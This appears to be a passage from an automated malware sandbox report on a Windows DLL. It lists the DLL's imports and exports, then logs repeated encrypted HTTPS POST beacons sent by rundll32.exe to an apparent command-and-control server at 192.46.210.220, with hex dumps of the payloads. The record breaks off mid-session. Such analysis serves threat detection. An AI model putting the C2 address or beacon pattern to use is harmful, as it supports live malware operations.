KERNEL32.dll  GetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

Exports

Name        Ordinal  Address
Bluewing    1        0x49eed0
Earth       2        0x49efd0
Masterjust  3        0x49eb20

Network Behavior

Network Port Distribution

TCP Packets


HTTP Request Dependency Graph

• 192.46.210.220

HTTPS Proxied Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.3  49744        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:03:46 UTC  0                   OUT        POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:03:46 UTC  4                   IN         HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:03:46 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.3  49747        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:03:48 UTC  4                   OUT        POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
2021-10-28 03:03:49 UTC  9                   IN         HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:03:49 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
10          192.168.2.3  49786        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:09 UTC  49                  OUT        POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
2021-10-28 03:04:09 UTC  54                  IN         HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:04:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
11          192.168.2.3  49788        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:09 UTC  54                  OUT        POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:09 UTC54OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:10 UTC59INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:10 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49794 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:13 UTC | 59 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4814
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:04:13 UTC | 59 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:04:13 UTC | 64 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:04:13 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49796 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:13 UTC | 64 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4802
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:04:13 UTC | 64 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:04:14 UTC | 69 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:04:14 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.3 | 49802 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:17 UTC | 69 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4814
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:04:17 UTC | 69 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:04:17 UTC | 73 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:04:17 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49804 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:17 UTC | 74 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4802
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:04:17 UTC | 74 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:04:18 UTC | 78 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:04:18 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.3 | 49812 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:21 UTC | 79 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4814
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:04:21 UTC | 79 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:04:21 UTC | 88 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:04:21 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.3 | 49814 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:21 UTC | 83 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4802
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:04:21 UTC | 83 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:04:22 UTC | 88 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:04:22 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.3 | 49822 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:24 UTC | 88 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4814
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:04:24 UTC | 89 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:04:25 UTC | 93 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:04:25 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.3 | 49824 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:25 UTC | 93 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4802
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:04:25 UTC | 94 | OUT | Data Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:04:26 UTC | 98 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:04:26 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49754 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:03:52 UTC | 9 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4814
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:03:52 UTC | 9 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:03:53 UTC | 19 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:03:53 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.3 | 49832 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:04:28 UTC | 98 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4814
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:04:28 UTC | 98 | OUT | Data Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:04:29 UTC | 103 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:04:29 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
21          192.168.2.3  49834        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe
Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:29 UTC  103                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4802
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 03:04:30 UTC  108                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 03:04:30 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
22          192.168.2.3  49840        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe
Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:32 UTC  108                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4814
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 03:04:33 UTC  113                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 03:04:33 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
23          192.168.2.3  49842        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe
Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:33 UTC  113                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4802
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 03:04:34 UTC  118                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 03:04:34 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
24          192.168.2.3  49852        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe
Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:36 UTC  118                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4814
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 03:04:37 UTC  123                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 03:04:37 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
25          192.168.2.3  49855        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe
Timestamp                kBytes transferred  Direction  Data
2021-10-28 03:04:37 UTC  123                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4802
                                                        Connection: Close
